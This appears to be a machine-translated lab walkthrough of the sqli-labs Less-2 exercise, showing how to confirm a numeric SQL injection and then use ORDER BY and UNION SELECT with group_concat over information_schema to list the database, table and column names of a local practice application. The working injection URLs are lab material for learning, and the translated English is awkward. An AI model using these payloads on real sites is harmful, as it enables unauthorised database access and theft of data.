Catalog

​​​​​​​ Their thinking

Blast storage

Explosion meter

Pop field

summary

 group_concat() function

-- 

order by

union

​​​​​​​

​​​​​​​ Their thinking

First of all, we need to judge whether it exists sql Inject holes , Look for the injection point ,SQL There are usually two types of injection , Plastic injection and character injection , If we want to judge which kind of injection this is, we need to analyze the error reporting statements here , Input –+ take sql After the following statement is commented out , You can judge the type by finding out whether the page echo is normal , Then use order by Sentence judgment , There are several columns of data in this table , And then id=1 Change to a database that doesn't exist id value , Such as -1, Use union select 1,2,3 Joint query statement to see whether the page has display bits , The last is to explode the library , Explosion meter , Pop field .

Blast storage

http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,2,database()–+

Explosion meter

http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’–+

Pop field

http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=‘security’–+

summary

 group_concat() function

group_concat() Which lines belong to the same group , Show columns that belong to the same group . Which columns to return , By function parameter ( Is the field name ) decision . There must be a standard for grouping , It is based on group by The specified columns are grouped , That is, it is used to put SQL The results of statements are spliced together .

-- 

stay SQL Inside is a comment , But in URL in , If you add at the end -- , When the browser sends the request, it will send URL The space at the end is rounded off , So we use –+ Instead of -- , as a result of + stay URL By URL After encoding, it will become a space .

order by

By using order by Sentence to judge , There are several columns of data in this table .（ The judgment method is whether the page echo is normal ）.

union

  Combine two result sets , Do not include repeating lines , At the same time, sort the default rules ;union Duplicate records will be filtered out after table linking , Therefore, after the table is linked, the generated result set will be sorted , Delete duplicate records and return results . On the left of the question select The clause query results are empty , that union The query result on the right naturally becomes the first row , Printed on the web page . take id Change to -1, send union The previous statement reports an error , It'll do the following .